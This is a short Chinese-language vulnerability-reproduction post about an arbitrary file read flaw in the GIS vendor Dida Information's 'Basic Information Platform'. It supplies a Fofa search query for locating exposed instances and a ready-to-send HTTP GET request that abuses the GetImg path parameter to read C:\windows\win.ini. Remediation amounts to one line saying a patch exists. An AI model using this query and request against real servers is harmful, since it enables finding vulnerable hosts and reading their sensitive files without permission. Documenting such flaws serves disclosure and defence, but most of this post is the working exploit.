地大信息-基础信息平台 GetImg 任意文件读取漏洞复现

0x01 漏洞描述:

武汉地大信息工程股份有限公司(简称"地大信息")是一家以地理信息系统(GIS)为核心技术的信息技术服务企业。该公司主要提供包括但不限于空间数据采集与处理、地理信息系统开发、软件定制开发等服务。

旗下的基础信息平台存在任意文件上传漏洞、任意文件读取漏洞,攻击者可通过该漏洞获取服务器权限,获取主机敏感信息。

0x02 搜索语句:

Fofa:body="/SystemManage/BaseProject" || title=="基础信息平台"

0x03 漏洞复现:

复制代码
GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close

0x04 修复建议:

厂商已发布补丁 请及时修复

相关推荐
☞无能盖世♛逞何英雄☜31 分钟前
Upload-labs靶场通关
安全
zhu12893035561 小时前
网络安全防护与挑战
网络·安全·web安全
神经毒素2 小时前
WEB安全--文件上传漏洞--36C3 CTF includer bypass
linux·安全·web安全
DPLSLAB62 小时前
数字孪生重构安全边界:无人机 “虚拟孪生体“ 的预演革命 —— 北京智慧云测构建全要素仿真体系
安全·重构·无人机
蒜白4 小时前
28--当路由器开始“宫斗“:设备控制面安全配置全解
安全·网络工程师·路由·ospf·bgp
扣脚大汉在网络4 小时前
云原生安全渗透篇
安全·云原生·dubbo
vortex56 小时前
Windows 权限配置文件解析与安全分析(GPP,GPO,LSA)
windows·安全·渗透测试
网络安全指导员6 小时前
如何在JMeter中配置断言,将非200状态码视为测试成功
网络·学习·jmeter·安全·web安全·架构
virelin_Y.lin6 小时前
系统与网络安全------Windows系统安全(5)
安全·系统安全·磁盘分区
红肤色8 小时前
【网络安全基础】CentOS 7超详细安装教程(含镜像)
linux·运维·服务器·安全·网络安全·centos